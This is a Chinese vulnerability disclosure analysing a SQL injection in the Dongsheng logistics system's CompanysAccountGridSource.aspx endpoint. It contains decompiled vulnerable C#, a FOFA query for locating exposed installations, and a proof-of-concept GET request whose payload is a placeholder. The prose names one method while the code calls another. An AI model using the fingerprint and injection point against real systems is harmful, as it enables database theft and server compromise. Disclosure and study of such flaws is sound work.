漏洞简介
东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 Shipping/CompanysAccountGridSource.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
影响版本
fofa语法
(body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css") && body="东胜"
漏洞分析
根据 Shipping/CompanysAccountGridSource.aspx 的代码引用<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="CompanysAccountGridSource.aspx.cs" Inherits="DSWeb.Shipping.CompanysAccountGridSource" %>,在dll中找到DSWeb.Shipping.CompanysAccountGridSource的逻辑实现
protected void Page_Load(object sender, EventArgs e)
{
if (this.Request.QueryString["read"] != null)
this.strReadXmlType = this.Request.QueryString["read"].ToString().Trim();
if (this.Request.QueryString["showcount"] != null)
this.iShowCount = int.Parse(this.Request.QueryString["showcount"].ToString());
if (this.Request.QueryString["LINKID"] != null)
this.strLINKID = this.Request.QueryString["LINKID"].ToString();
if (!this.strReadXmlType.Equals(""))
{
if (this.strReadXmlType.Equals("delete") || this.strReadXmlType.Equals("recover"))
{
this.strAccountGid = this.Request.QueryString["gid"];
this.strHandle = this.Request.QueryString["read"];
if (this.strAccountGid == null || this.strHandle == null)
this.Response.Write((object) -99);
else
this.Response.Write(this.DoExcute(this.strAccountGid, this.strHandle));
}
else
{
string cells = this.GetCells(this.iShowCount, this.strReadXmlType);
this.Response.ContentType = "text/xml";
cells.Replace("&", "&");
this.Response.Write(cells);
}
}
else
{
this.Response.ContentType = "text/xml";
this.Response.Write("-2");
}
}
- 用户输入从
Request.QueryString["LINKID"]获取(第 21 行) - 直接赋值给成员变量
strLINKID,未经任何过滤 - 在构建 SQL 语句时使用字符串插值
$"..."直接拼接到 WHERE 子句 LINKID字段为字符串类型(SQL 中使用单引号包围:'{this.strLINKID}')
当参数read满足以下条件
read参数不能为空字符串read参数不能是 "delete" 或 "recover"
进入GetCells方法
private string GetCells(int iShowCount, string readXmlType)
{
AccountEntity accountEntity1 = new AccountEntity();
AccountDA accountDa = new AccountDA();
AccountEntity accountEntity2 = new AccountEntity();
AccountEntity accountByLinkidAndType = accountDa.GetAccountByLINKIDAndType(this.strLINKID);
if (accountByLinkidAndType != null && !this.strReadXmlType.Equals("exist"))
{
DataTable dataTable = new DataTable();
string strSql = $" SELECT GID,LINKID,CODENAME,CURRENCY,BANKNAME,ACCOUNT,SubjectCode,FINANCESOFTCODE,REMARK,CREATEUSER,CREATETIME,MODIFIEDUSER,MODIFIEDTIME FROM sys_bank WHERE LINKID = '{this.strLINKID}' ORDER BY CODENAME ASC";
DataTable statusNameTable = this.getStatusNameTable(accountDa.GetExcuteSql(strSql).Tables[0]);
跟进GetSysDeptByLINKIDAndType方法
public SysDeptEntity GetSysDeptByLINKIDAndType(string strLINKID)
{
SysDeptEntity deptByLinkidAndType = (SysDeptEntity) null;
string cmdText = $" SELECT top 1 GID,LINKID,DEPTNO,DEPTNAME,MANAGE1,MANAGE2,REMARK,CREATEUSER,CREATETIME,MODIFIEDUSER,MODIFIEDTIME,FINANCESOFTCODE FROM sys_dept WHERE LINKID = '{strLINKID}'";
using (SqlDataReader sqlDataReader = SqlHelper.ExecuteReader(SqlHelper.ConnectionStringLocalTransaction, (CommandType) 1, cmdText, (SqlParameter[]) null))
参数strLINKID即外部用户可控参数LINKID被直接拼接在SQL语句中执行,无任何过滤或校验,从而造成SQL注入漏洞。
漏洞复现
GET /Shipping/CompanysAccountGridSource.aspx?read=1&LINKID=SQLI_POC HTTP/1.1
Host: dongsheng.mrxn.net

成功延时 5 秒

